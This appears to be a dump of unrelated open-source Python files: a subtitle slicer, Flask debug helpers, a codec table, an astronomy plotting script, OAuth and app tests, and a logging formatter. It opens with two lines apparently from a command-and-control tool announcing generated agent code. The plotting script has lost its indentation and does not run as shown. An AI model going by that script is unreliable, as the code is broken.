print helpers.color("[*] %s agent code for listener %s with sessionID '%s' written out to %s" % (language, listenerName, sessionID, outFile))
print helpers.color("[*] Run sysinfo command after agent starts checking in!")
| bsd-3-clause |
fredhohman/a-viz-of-ice-and-fire | scripts/slice_clean_dialogue_general.py | 1 | 2079 | # author: istewart6 (some help from ssoni)
"""
Code to break subtitle dialogue
into 60 equal-length clean slices per episode.
"""
from __future__ import division
import pandas as pd
from datetime import datetime
import re, os
import argparse
from clean_extracted_text import clean_text
def convert_time(time_):
    """Convert an 'HH:MM:SS,mmm' subtitle timestamp to minutes as a float.

    The millisecond component is parsed but intentionally ignored;
    seconds contribute fractionally (true division via the module-level
    __future__ import).
    """
    parsed = datetime.strptime(time_, '%H:%M:%S,%f')
    minutes = 60 * parsed.hour + parsed.minute
    return minutes + parsed.second / 60
def main():
    """Split a subtitle TSV into 60 equal-length time slices, clean the
    dialogue text, drop consecutive duplicate lines, and write the result
    to '<name>_clean.tsv' next to the input file.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--sub_file', default='../data/subtitles/subtitlesInTSV/finding_nemo.tsv')
    args = parser.parse_args()
    sub_file = args.sub_file
    sub_name = os.path.basename(sub_file).replace('.tsv', '_clean')
    out_dir = os.path.dirname(sub_file)
    n_slices = 60
    sub_data = pd.read_csv(sub_file, sep='\t', index_col=0)
    # The last subtitle's end time (in minutes) defines the episode length.
    end = sub_data['endTime'].max()
    end = convert_time(end)
    print('got end %s'%(end))
    slice_length = end / n_slices
    # Assign each subtitle row to the slice its start time falls into.
    slices = sub_data.apply(lambda r : int(convert_time(r['startTime']) / slice_length),
                            axis=1)
    sub_data['slice'] = slices
    # Clean the dialogue text.
    sub_data['dialogue'] = sub_data['dialogue'].apply(clean_text)
    # Drop rows whose dialogue repeats the previous row verbatim
    # (case-insensitive); first and last rows are always skipped.
    clean_rows = []
    row_count = sub_data.shape[0]
    # Bug fix: was "for i, r in 0sub_data.iterrows():" -- a corrupted token
    # that made this a syntax error.
    for i, r in sub_data.iterrows():
        if(i > 0 and i < row_count-1):
            current_dialogue = r['dialogue'].lower().strip()
            # NOTE(review): .ix is deprecated in modern pandas and this
            # assumes an integer row index -- verify before upgrading.
            last_dialogue = sub_data.ix[i-1, 'dialogue'].lower().strip()
            if(current_dialogue != last_dialogue):
                r = pd.DataFrame(r).transpose()
                clean_rows.append(r)
    print('got %d/%d clean rows'%(len(clean_rows), sub_data.shape[0]))
    sub_data = pd.concat(clean_rows, axis=0)
    out_name = os.path.join(out_dir, '%s.tsv'%(sub_name))
    sub_data.to_csv(out_name, sep='\t', index=False)
if __name__ == '__main__':
    # Entry point when run as a script.
    main()
| mit |
LonglyCode/flask | flask/debughelpers.py | 318 | 6024 | # -*- coding: utf-8 -*-
"""
flask.debughelpers
~~~~~~~~~~~~~~~~~~
Various helpers to make the development experience better.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from ._compat import implements_to_string, text_type
from .app import Flask
from .blueprints import Blueprint
from .globals import _request_ctx_stack
class UnexpectedUnicodeError(AssertionError, UnicodeError):
    """Raised in places where we want some better error reporting for
    unexpected unicode or binary data.

    Inherits from both AssertionError and UnicodeError so callers may
    catch it under either category.
    """
@implements_to_string
class DebugFilesKeyError(KeyError, AssertionError):
    """Raised from request.files during debugging.  Provides a far more
    helpful message than a generic KeyError/BadRequest when a form was
    submitted without the multipart enctype.
    """

    def __init__(self, request, key):
        message = ('You tried to access the file "%s" in the request.files '
                   'dictionary but it does not exist. The mimetype for the request '
                   'is "%s" instead of "multipart/form-data" which means that no '
                   'file contents were transmitted. To fix this error you should '
                   'provide enctype="multipart/form-data" in your form.'
                   % (key, request.mimetype))
        # If the same key arrived as plain form data, show what the browser
        # actually sent (usually just the file names).
        submitted = request.form.getlist(key)
        if submitted:
            names = ', '.join('"%s"' % name for name in submitted)
            message += ('\n\nThe browser instead transmitted some file names. '
                        'This was submitted: %s' % names)
        self.msg = message

    def __str__(self):
        return self.msg
class FormDataRoutingRedirect(AssertionError):
    """Raised by Flask in debug mode when the routing system issues a
    redirect for a request whose method is not GET, HEAD or OPTIONS.
    Reasoning: any submitted form data would be dropped by the redirect.
    """

    def __init__(self, request):
        exc = request.routing_exception
        parts = ['A request was sent to this URL (%s) but a redirect was '
                 'issued automatically by the routing system to "%s".'
                 % (request.url, exc.new_url)]

        # Be extra helpful when the redirect merely appends a slash.
        if exc.new_url.split('?')[0] == request.base_url + '/':
            parts.append(' The URL was defined with a trailing slash so '
                         'Flask will automatically redirect to the URL '
                         'with the trailing slash if it was accessed '
                         'without one.')

        parts.append(' Make sure to directly send your %s-request to this URL '
                     'since we can\'t make browsers or HTTP clients redirect '
                     'with form data reliably or without user interaction.' %
                     request.method)
        parts.append('\n\nNote: this exception is only raised in debug mode')
        AssertionError.__init__(self, ''.join(parts).encode('utf-8'))
def attach_enctype_error_multidict(request):
    """Monkeypatch ``request.files`` (Flask 0.8+ debug aid) so that looking
    up a missing key raises a :class:`DebugFilesKeyError` with a helpful
    message when the form was submitted without the multipart enctype.
    """
    original_cls = request.files.__class__

    class PatchedFiles(original_cls):
        def __getitem__(self, key):
            try:
                return original_cls.__getitem__(self, key)
            except KeyError:
                # Only upgrade the error if the key did arrive as form
                # data, i.e. the enctype was wrong.
                if key not in request.form:
                    raise
                raise DebugFilesKeyError(request, key)

    # Keep the patched class indistinguishable from the original.
    PatchedFiles.__name__ = original_cls.__name__
    PatchedFiles.__module__ = original_cls.__module__
    request.files.__class__ = PatchedFiles
def _dump_loader_info(loader):
    """Yield human-readable lines describing a template loader's class and
    its public, simple-valued attributes.
    """
    cls = type(loader)
    yield 'class: %s.%s' % (cls.__module__, cls.__name__)
    for key, value in sorted(loader.__dict__.items()):
        if key.startswith('_'):
            continue  # private attributes are not interesting
        if isinstance(value, (tuple, list)):
            # Only dump sequences consisting purely of strings.
            if all(isinstance(item, (str, text_type)) for item in value):
                yield '%s:' % key
                for item in value:
                    yield '  - %s' % item
            continue
        if isinstance(value, (str, text_type, int, float, bool)):
            yield '%s: %r' % (key, value)
def explain_template_loading_attempts(app, template, attempts):
    """This should help developers understand what failed.

    Logs (via app.logger) a report of every loader that was tried for
    *template*, what each loader looked like, and whether it matched.
    ``attempts`` is a list of ``(loader, source_object, triple)`` where
    ``triple`` is the loader result or None on no match.
    """
    info = ['Locating template "%s":' % template]
    total_found = 0
    blueprint = None
    # If we are inside a request bound to a blueprint, remember it so we
    # can hint about blueprint-relative template folders below.
    reqctx = _request_ctx_stack.top
    if reqctx is not None and reqctx.request.blueprint is not None:
        blueprint = reqctx.request.blueprint

    for idx, (loader, srcobj, triple) in enumerate(attempts):
        # Describe where the loader came from (app, blueprint or other).
        if isinstance(srcobj, Flask):
            src_info = 'application "%s"' % srcobj.import_name
        elif isinstance(srcobj, Blueprint):
            src_info = 'blueprint "%s" (%s)' % (srcobj.name,
                                                srcobj.import_name)
        else:
            src_info = repr(srcobj)

        info.append('% 5d: trying loader of %s' % (
            idx + 1, src_info))

        for line in _dump_loader_info(loader):
            info.append('    %s' % line)

        if triple is None:
            detail = 'no match'
        else:
            detail = 'found (%r)' % (triple[1] or '<string>')
            total_found += 1
        info.append('       -> %s' % detail)

    seems_fishy = False
    if total_found == 0:
        info.append('Error: the template could not be found.')
        seems_fishy = True
    elif total_found > 1:
        info.append('Warning: multiple loaders returned a match for the template.')
        seems_fishy = True

    # Blueprint-bound requests with a lookup problem get an extra hint
    # about template folder placement.
    if blueprint is not None and seems_fishy:
        info.append('  The template was looked up from an endpoint that '
                    'belongs to the blueprint "%s".' % blueprint)
        info.append('  Maybe you did not place a template in the right folder?')
        info.append('  See http://flask.pocoo.org/docs/blueprints/#templates')

    app.logger.info('\n'.join(info))
| bsd-3-clause |
louietsai/python-for-android | python3-alpha/python3-src/Lib/encodings/mac_latin2.py | 647 | 8565 | """ Python Character Mapping Codec generated from 'LATIN2.TXT' with gencodec.py.
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
(c) Copyright 2000 Guido van Rossum.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
    """Stateless codec backed by the module-level charmap tables."""

    def encode(self, input, errors='strict'):
        """Encode text to mac-latin2 bytes via the static encoding map."""
        return codecs.charmap_encode(input, errors, encoding_map)

    def decode(self, input, errors='strict'):
        """Decode mac-latin2 bytes to text via the static decoding map."""
        return codecs.charmap_decode(input, errors, decoding_map)
class IncrementalEncoder(codecs.IncrementalEncoder):
    """Incremental encoder; stateless, so each chunk encodes independently."""

    def encode(self, input, final=False):
        encoded, _consumed = codecs.charmap_encode(input, self.errors, encoding_map)
        return encoded
class IncrementalDecoder(codecs.IncrementalDecoder):
    """Incremental decoder; stateless, so each chunk decodes independently."""

    def decode(self, input, final=False):
        decoded, _consumed = codecs.charmap_decode(input, self.errors, decoding_map)
        return decoded
class StreamWriter(Codec,codecs.StreamWriter):
    # Stream writer: combines this codec's encode with the generic
    # StreamWriter machinery; no extra behavior needed.
    pass
class StreamReader(Codec,codecs.StreamReader):
    # Stream reader: combines this codec's decode with the generic
    # StreamReader machinery; no extra behavior needed.
    pass
### encodings module API
def getregentry():
    """Return the CodecInfo record used to register the 'mac-latin2' codec."""
    codec = Codec()
    return codecs.CodecInfo(
        name='mac-latin2',
        encode=codec.encode,
        decode=codec.decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x00c4, # LATIN CAPITAL LETTER A WITH DIAERESIS
0x0081: 0x0100, # LATIN CAPITAL LETTER A WITH MACRON
0x0082: 0x0101, # LATIN SMALL LETTER A WITH MACRON
0x0083: 0x00c9, # LATIN CAPITAL LETTER E WITH ACUTE
0x0084: 0x0104, # LATIN CAPITAL LETTER A WITH OGONEK
0x0085: 0x00d6, # LATIN CAPITAL LETTER O WITH DIAERESIS
0x0086: 0x00dc, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x0087: 0x00e1, # LATIN SMALL LETTER A WITH ACUTE
0x0088: 0x0105, # LATIN SMALL LETTER A WITH OGONEK
0x0089: 0x010c, # LATIN CAPITAL LETTER C WITH CARON
0x008a: 0x00e4, # LATIN SMALL LETTER A WITH DIAERESIS
0x008b: 0x010d, # LATIN SMALL LETTER C WITH CARON
0x008c: 0x0106, # LATIN CAPITAL LETTER C WITH ACUTE
0x008d: 0x0107, # LATIN SMALL LETTER C WITH ACUTE
0x008e: 0x00e9, # LATIN SMALL LETTER E WITH ACUTE
0x008f: 0x0179, # LATIN CAPITAL LETTER Z WITH ACUTE
0x0090: 0x017a, # LATIN SMALL LETTER Z WITH ACUTE
0x0091: 0x010e, # LATIN CAPITAL LETTER D WITH CARON
0x0092: 0x00ed, # LATIN SMALL LETTER I WITH ACUTE
0x0093: 0x010f, # LATIN SMALL LETTER D WITH CARON
0x0094: 0x0112, # LATIN CAPITAL LETTER E WITH MACRON
0x0095: 0x0113, # LATIN SMALL LETTER E WITH MACRON
0x0096: 0x0116, # LATIN CAPITAL LETTER E WITH DOT ABOVE
0x0097: 0x00f3, # LATIN SMALL LETTER O WITH ACUTE
0x0098: 0x0117, # LATIN SMALL LETTER E WITH DOT ABOVE
0x0099: 0x00f4, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x009a: 0x00f6, # LATIN SMALL LETTER O WITH DIAERESIS
0x009b: 0x00f5, # LATIN SMALL LETTER O WITH TILDE
0x009c: 0x00fa, # LATIN SMALL LETTER U WITH ACUTE
0x009d: 0x011a, # LATIN CAPITAL LETTER E WITH CARON
0x009e: 0x011b, # LATIN SMALL LETTER E WITH CARON
0x009f: 0x00fc, # LATIN SMALL LETTER U WITH DIAERESIS
0x00a0: 0x2020, # DAGGER
0x00a1: 0x00b0, # DEGREE SIGN
0x00a2: 0x0118, # LATIN CAPITAL LETTER E WITH OGONEK
0x00a4: 0x00a7, # SECTION SIGN
0x00a5: 0x2022, # BULLET
0x00a6: 0x00b6, # PILCROW SIGN
0x00a7: 0x00df, # LATIN SMALL LETTER SHARP S
0x00a8: 0x00ae, # REGISTERED SIGN
0x00aa: 0x2122, # TRADE MARK SIGN
0x00ab: 0x0119, # LATIN SMALL LETTER E WITH OGONEK
0x00ac: 0x00a8, # DIAERESIS
0x00ad: 0x2260, # NOT EQUAL TO
0x00ae: 0x0123, # LATIN SMALL LETTER G WITH CEDILLA
0x00af: 0x012e, # LATIN CAPITAL LETTER I WITH OGONEK
0x00b0: 0x012f, # LATIN SMALL LETTER I WITH OGONEK
0x00b1: 0x012a, # LATIN CAPITAL LETTER I WITH MACRON
0x00b2: 0x2264, # LESS-THAN OR EQUAL TO
0x00b3: 0x2265, # GREATER-THAN OR EQUAL TO
0x00b4: 0x012b, # LATIN SMALL LETTER I WITH MACRON
0x00b5: 0x0136, # LATIN CAPITAL LETTER K WITH CEDILLA
0x00b6: 0x2202, # PARTIAL DIFFERENTIAL
0x00b7: 0x2211, # N-ARY SUMMATION
0x00b8: 0x0142, # LATIN SMALL LETTER L WITH STROKE
0x00b9: 0x013b, # LATIN CAPITAL LETTER L WITH CEDILLA
0x00ba: 0x013c, # LATIN SMALL LETTER L WITH CEDILLA
0x00bb: 0x013d, # LATIN CAPITAL LETTER L WITH CARON
0x00bc: 0x013e, # LATIN SMALL LETTER L WITH CARON
0x00bd: 0x0139, # LATIN CAPITAL LETTER L WITH ACUTE
0x00be: 0x013a, # LATIN SMALL LETTER L WITH ACUTE
0x00bf: 0x0145, # LATIN CAPITAL LETTER N WITH CEDILLA
0x00c0: 0x0146, # LATIN SMALL LETTER N WITH CEDILLA
0x00c1: 0x0143, # LATIN CAPITAL LETTER N WITH ACUTE
0x00c2: 0x00ac, # NOT SIGN
0x00c3: 0x221a, # SQUARE ROOT
0x00c4: 0x0144, # LATIN SMALL LETTER N WITH ACUTE
0x00c5: 0x0147, # LATIN CAPITAL LETTER N WITH CARON
0x00c6: 0x2206, # INCREMENT
0x00c7: 0x00ab, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00c8: 0x00bb, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00c9: 0x2026, # HORIZONTAL ELLIPSIS
0x00ca: 0x00a0, # NO-BREAK SPACE
0x00cb: 0x0148, # LATIN SMALL LETTER N WITH CARON
0x00cc: 0x0150, # LATIN CAPITAL LETTER O WITH DOUBLE ACUTE
0x00cd: 0x00d5, # LATIN CAPITAL LETTER O WITH TILDE
0x00ce: 0x0151, # LATIN SMALL LETTER O WITH DOUBLE ACUTE
0x00cf: 0x014c, # LATIN CAPITAL LETTER O WITH MACRON
0x00d0: 0x2013, # EN DASH
0x00d1: 0x2014, # EM DASH
0x00d2: 0x201c, # LEFT DOUBLE QUOTATION MARK
0x00d3: 0x201d, # RIGHT DOUBLE QUOTATION MARK
0x00d4: 0x2018, # LEFT SINGLE QUOTATION MARK
0x00d5: 0x2019, # RIGHT SINGLE QUOTATION MARK
0x00d6: 0x00f7, # DIVISION SIGN
0x00d7: 0x25ca, # LOZENGE
0x00d8: 0x014d, # LATIN SMALL LETTER O WITH MACRON
0x00d9: 0x0154, # LATIN CAPITAL LETTER R WITH ACUTE
0x00da: 0x0155, # LATIN SMALL LETTER R WITH ACUTE
0x00db: 0x0158, # LATIN CAPITAL LETTER R WITH CARON
0x00dc: 0x2039, # SINGLE LEFT-POINTING ANGLE QUOTATION MARK
0x00dd: 0x203a, # SINGLE RIGHT-POINTING ANGLE QUOTATION MARK
0x00de: 0x0159, # LATIN SMALL LETTER R WITH CARON
0x00df: 0x0156, # LATIN CAPITAL LETTER R WITH CEDILLA
0x00e0: 0x0157, # LATIN SMALL LETTER R WITH CEDILLA
0x00e1: 0x0160, # LATIN CAPITAL LETTER S WITH CARON
0x00e2: 0x201a, # SINGLE LOW-9 QUOTATION MARK
0x00e3: 0x201e, # DOUBLE LOW-9 QUOTATION MARK
0x00e4: 0x0161, # LATIN SMALL LETTER S WITH CARON
0x00e5: 0x015a, # LATIN CAPITAL LETTER S WITH ACUTE
0x00e6: 0x015b, # LATIN SMALL LETTER S WITH ACUTE
0x00e7: 0x00c1, # LATIN CAPITAL LETTER A WITH ACUTE
0x00e8: 0x0164, # LATIN CAPITAL LETTER T WITH CARON
0x00e9: 0x0165, # LATIN SMALL LETTER T WITH CARON
0x00ea: 0x00cd, # LATIN CAPITAL LETTER I WITH ACUTE
0x00eb: 0x017d, # LATIN CAPITAL LETTER Z WITH CARON
0x00ec: 0x017e, # LATIN SMALL LETTER Z WITH CARON
0x00ed: 0x016a, # LATIN CAPITAL LETTER U WITH MACRON
0x00ee: 0x00d3, # LATIN CAPITAL LETTER O WITH ACUTE
0x00ef: 0x00d4, # LATIN CAPITAL LETTER O WITH CIRCUMFLEX
0x00f0: 0x016b, # LATIN SMALL LETTER U WITH MACRON
0x00f1: 0x016e, # LATIN CAPITAL LETTER U WITH RING ABOVE
0x00f2: 0x00da, # LATIN CAPITAL LETTER U WITH ACUTE
0x00f3: 0x016f, # LATIN SMALL LETTER U WITH RING ABOVE
0x00f4: 0x0170, # LATIN CAPITAL LETTER U WITH DOUBLE ACUTE
0x00f5: 0x0171, # LATIN SMALL LETTER U WITH DOUBLE ACUTE
0x00f6: 0x0172, # LATIN CAPITAL LETTER U WITH OGONEK
0x00f7: 0x0173, # LATIN SMALL LETTER U WITH OGONEK
0x00f8: 0x00dd, # LATIN CAPITAL LETTER Y WITH ACUTE
0x00f9: 0x00fd, # LATIN SMALL LETTER Y WITH ACUTE
0x00fa: 0x0137, # LATIN SMALL LETTER K WITH CEDILLA
0x00fb: 0x017b, # LATIN CAPITAL LETTER Z WITH DOT ABOVE
0x00fc: 0x0141, # LATIN CAPITAL LETTER L WITH STROKE
0x00fd: 0x017c, # LATIN SMALL LETTER Z WITH DOT ABOVE
0x00fe: 0x0122, # LATIN CAPITAL LETTER G WITH CEDILLA
0x00ff: 0x02c7, # CARON
})
### Encoding Map
encoding_map = codecs.make_encoding_map(decoding_map)
| apache-2.0 |
mkness/TheCannon | code/makeplots_talks/makeplot_fits_self_cluster_ages.py | 1 | 6112 | #!/usr/bin/python
import scipy
import numpy
import pickle
from numpy import *
from scipy import ndimage
from scipy import interpolate
from numpy import loadtxt
import os
import numpy as np
from numpy import *
import matplotlib
from pylab import rcParams
from pylab import *
from matplotlib import pyplot
import matplotlib.pyplot as plt
from matplotlib import colors
from matplotlib.pyplot import axes
from matplotlib.pyplot import colorbar
#from matplotlib.ticker import NullFormatter
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
s = matplotlib.font_manager.FontProperties()
s.set_family('serif')
s.set_size(14)
from matplotlib import rc
rc('text', usetex=False)
rc('font', family='serif')
def plotfits():
# file_in = "self_tags.pickle"
file_in = "self_2nd_order_tags.pickle"
file_in2 = open(file_in, 'r')
params, icovs_params = pickle.load(file_in2)
params = array(params)
file_in2.close()
filein2 = 'starsin_test2.txt' # this is for self test this is dangerous - need to implement the same logg cut here, this is original data values or otherwise metadata
filein2 = 'starsin_new_all_ordered.txt' # this is for self test this is dangerous - need to implement the same logg cut here, this is original data values or otherwise metadata
filein2 = 'test4_selfg.txt' # this is for self test this is dangerous - need to implement the same logg cut here, this is original data values or otherwise metadata
filein3 = 'ages.txt'
a = open(filein2)
al = a.readlines()
names = []
for each in al:
names.append(each.split()[1])
unames = unique(names)
starind = arange(0,len(names), 1)
name_ind = []
names = array(names)
for each in unames:
takeit = each == names
name_ind.append(np.int(starind[takeit][-1]+1. ) )
cluster_ind = [0] + list(sort(name_ind))# + [len(al)]
plot_markers = ['ko', 'yo', 'ro', 'bo', 'co','k*', 'y*', 'r*', 'b*', 'c*', 'ks', 'rs', 'bs', 'cs', 'rd', 'kd', 'bd', 'cd', 'mo', 'ms' ]
t,g,feh,t_err,feh_err = loadtxt(filein2, usecols = (4,6,8,16,17), unpack =1)
tA,gA,fehA = loadtxt(filein2, usecols = (3,5,7), unpack =1)
age = loadtxt(filein3, usecols = (0,), unpack =1)
#
g_err = [0]*len(g)
g_err = array(g_err)
diffT = abs(array(t) - array(tA) )
pick = diffT < 4000.
t,g,feh,t_err,g_err,feh_err = t[pick], g[pick], feh[pick], t_err[pick], g_err[pick], feh_err[pick]
age = age[pick]
#
g_err = [0]*len(g)
age_err = [0]*len(g)
g_err = array(g_err)
age_err = array(age_err)
params = array(params)
covs_params = np.linalg.inv(icovs_params)
rcParams['figure.figsize'] = 12.0, 10.0
fig, temp = pyplot.subplots(4,1, sharex=False, sharey=False)
fig = plt.figure()
ax = fig.add_subplot(111, frameon = 0 )
ax.set_ylabel("The Cannon", labelpad = 40, fontsize = 20 )
ax.tick_params(labelcolor= 'w', top = 'off', bottom = 'off', left = 'off', right = 'off' )
ax1 = fig.add_subplot(411)
ax2 = fig.add_subplot(412)
ax3 = fig.add_subplot(413)
ax4 = fig.add_subplot(414)
#ax1 = temp[0]
#ax2 = temp[1]
#ax3 = temp[2]
#ax4 = temp[3]
params_labels = [params[:,0], params[:,1], params[:,2] , params[:,3], covs_params[:,0,0]**0.5, covs_params[:,1,1]**0.5, covs_params[:,2,2]**0.5 , covs_params[:,3,3]**0.5]
cval = ['k', 'b', 'r', 'c']
input_ASPCAP = [t, g, feh, age, t_err, g_err, feh_err, age_err]
listit_1 = [0,1,2,3]
listit_2 = [1,0,0,0]
axs = [ax1,ax2,ax3,ax4]
labels = ['teff', 'logg', 'Fe/H', 'age' ]
for i in range(0,len(cluster_ind)-1):
indc1 = cluster_ind[i]
indc2 = cluster_ind[i+1]
for ax, num,num2,label1,x1,y1 in zip(axs, listit_1,listit_2,labels, [4800,3.0,0.3,0.3], [3400,1,-1.5,5]):
pick = logical_and(g[indc1:indc2] > 0, logical_and(t_err[indc1:indc2] < 300, feh[indc1:indc2] > -4.0) )
cind = array(input_ASPCAP[1][indc1:indc2][pick])
cind = array(input_ASPCAP[num2][indc1:indc2][pick]).flatten()
ax.plot(input_ASPCAP[num][indc1:indc2][pick], params_labels[num][indc1:indc2][pick], plot_markers[i])
#ax.errorbar(input_ASPCAP[num][indc1:indc2][pick], params_labels[num][indc1:indc2][pick],yerr= params_labels[num+3][indc1:indc2][pick],marker='',ls='',zorder=0, fmt = None,elinewidth = 1,capsize = 0)
#ax.errorbar(input_ASPCAP[num][indc1:indc2][pick], params_labels[num][indc1:indc2][pick],xerr=input_ASPCAP[num+3][indc1:indc2][pick],marker='',ls='',zorder=0, fmt = None,elinewidth = 1,capsize = 0)
#ax.text(x1,y1,"y-axis, $<\sigma>$ = "+str(round(mean(params_labels[num+3][pick]),2)),fontsize = 14)
ax1.plot([0,6000], [0,6000], linewidth = 1.5, color = 'k' )
ax2.plot([0,5], [0,5], linewidth = 1.5, color = 'k' )
ax3.plot([-3,2], [-3,2], linewidth = 1.5, color = 'k' )
ax4.plot([-5,25], [-5,25], linewidth = 1.5, color = 'k' )
ax1.set_xlim(3500, 5500)
ax1.set_ylim(3500, 5500)
ax2.set_xlim(0, 5)
ax2.set_ylim(0, 5)
ax3.set_xlim(-3, 2)
ax4.set_xlim(-3, 20)
ax4.set_ylim(-3, 20)
ax1.set_xlabel("ASPCAP Teff (IR flux method) , [K]", fontsize = 14,labelpad = 5)
ax1.set_ylabel("Teff, [K]", fontsize = 14,labelpad = 10)
ax2.set_xlabel("ASPCAP logg (Kepler correction) , [dex]", fontsize = 14,labelpad = 5)
ax2.set_ylabel("logg, [dex]", fontsize = 14,labelpad = 10)
ax3.set_xlabel("ASPCAP [Fe/H], [dex]", fontsize = 14,labelpad = 5)
ax3.set_ylabel(" [Fe/H], [dex]", fontsize = 14,labelpad = 10)
ax4.set_ylabel("Age [Gyr]", fontsize = 14,labelpad = 5)
ax4.set_xlabel("Literature Ages [Gyr]", fontsize = 14,labelpad = 10)
# attach lines to plots
fig.subplots_adjust(hspace=0.44)
return
def savefig(fig, prefix, **kwargs):
    """Save *fig* under *prefix* in both EPS and PNG format.

    Arguments:
        fig: a matplotlib figure (anything exposing ``savefig(path, **kw)``).
        prefix (str): output path without extension.
        **kwargs: forwarded verbatim to ``fig.savefig``.
    """
    for suffix in (".eps", ".png"):
        # print() call form works on both Python 2 and 3; the original used
        # the Python-2-only print statement.
        print("writing %s" % (prefix + suffix))
        fig.savefig(prefix + suffix, **kwargs)
if __name__ == "__main__": #args in command line
    # NOTE(review): these look like reference wavelengths in Angstroms
    # (H-band region); presumably read by plotfits(), which is defined
    # earlier in this file -- confirm they are actually used.
    wl1,wl2,wl3,wl4,wl5,wl6 = 15392, 15697, 15958.8, 16208.6, 16120.4, 16169.5
    plotfits()
| mit |
joelstanner/python-social-auth | social/tests/backends/test_instagram.py | 92 | 1787 | import json
from social.tests.backends.oauth import OAuth2Test
class InstagramOAuth2Test(OAuth2Test):
    """Login/pipeline tests for the Instagram OAuth2 backend.

    The HTTP exchanges are stubbed out by :class:`OAuth2Test`; the JSON
    fixtures below mirror the payloads the real Instagram API returns.
    """

    # Dotted path of the backend under test.
    backend_path = 'social.backends.instagram.InstagramOAuth2'
    user_data_url = 'https://api.instagram.com/v1/users/self'
    # Username the pipeline is expected to extract from the fixtures below.
    expected_username = 'foobar'
    # Canned response for the access-token exchange step.
    access_token_body = json.dumps({
        'access_token': 'foobar',
        'token_type': 'bearer',
        'meta': {
            'code': 200
        },
        'data': {
            'username': 'foobar',
            'bio': '',
            'website': '',
            # Adjacent string literals concatenate into one URL.
            'profile_picture': 'http://images.instagram.com/profiles/'
                               'anonymousUser.jpg',
            'full_name': '',
            'counts': {
                'media': 0,
                'followed_by': 2,
                'follows': 0
            },
            'id': '101010101'
        },
        'user': {
            'username': 'foobar',
            'bio': '',
            'website': '',
            'profile_picture': 'http://images.instagram.com/profiles/'
                               'anonymousUser.jpg',
            'full_name': '',
            'id': '101010101'
        }
    })
    # Canned response for the user-details endpoint (user_data_url above).
    user_data_body = json.dumps({
        'meta': {
            'code': 200
        },
        'data': {
            'username': 'foobar',
            'bio': '',
            'website': '',
            'profile_picture': 'http://images.instagram.com/profiles/'
                               'anonymousUser.jpg',
            'full_name': '',
            'counts': {
                'media': 0,
                'followed_by': 2,
                'follows': 0
            },
            'id': '101010101'
        }
    })

    def test_login(self):
        """The full login flow succeeds against the canned responses."""
        self.do_login()

    def test_partial_pipeline(self):
        """Resuming a partially-completed pipeline succeeds."""
        self.do_partial_pipeline()
| bsd-3-clause |
JianfengXu/crosswalk-test-suite | cordova/cordova-feature-android-tests/feature/mobilespec_close.py | 18 | 2240 | #!/usr/bin/env python
#
# Copyright (c) 2015 Intel Corporation.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of works must retain the original copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the original copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Intel Corporation nor the names of its contributors
# may be used to endorse or promote products derived from this work without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors:
# Lin, Wanming <wanming.lin@intel.com>
import unittest
import os
import commands
import comm
import time
class TestMobileSpecAppClose(unittest.TestCase):
    """Verifies the Cordova mobilespec app can be stopped on the device.

    Installs and launches the app first if necessary; the device plumbing
    lives in the project-local ``comm`` helper module.
    """

    def test_close(self):
        # Prepare the test environment (device/tooling setup).
        comm.setUp()
        app_name = "mobilespec"
        pkg_name = "org.apache." + app_name.lower()
        # Install on the device only if the package is missing.
        if not comm.check_app_installed(pkg_name, self):
            comm.app_install(app_name, pkg_name, self)
        # The app must be running before we can exercise a clean stop.
        if not comm.check_app_launched(pkg_name, self):
            print "Close app ---------------->%s App haven't launched, need to launch it!" % app_name
            comm.app_launch(app_name, pkg_name, self)
            # Give the app a moment to finish starting up.
            time.sleep(1)
        comm.app_stop(pkg_name, self)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
Sberned/djaio | djaio/core/logs.py | 1 | 2474 | # -*- coding: utf-8 -*-
import sys
import logging.config
from djaio.core.utils import deep_merge
class ColoredFormatter(logging.Formatter):
    """Formatter that can wrap the rendered message in ANSI colour codes."""

    RESET = '\x1B[0m'
    RED = '\x1B[31m'
    YELLOW = '\x1B[33m'
    BRGREEN = '\x1B[01;32m'  # grey in solarized for terminals

    def format(self, record, color=False):
        rendered = super().format(record)
        if not color:
            return rendered
        # Pick a tint by severity; ERROR and CRITICAL share red, INFO and
        # anything below DEBUG render with the terminal default.
        level = record.levelno
        if level >= logging.ERROR:
            tint = self.RED
        elif level >= logging.WARNING:
            tint = self.YELLOW
        elif level >= logging.INFO:
            tint = self.RESET
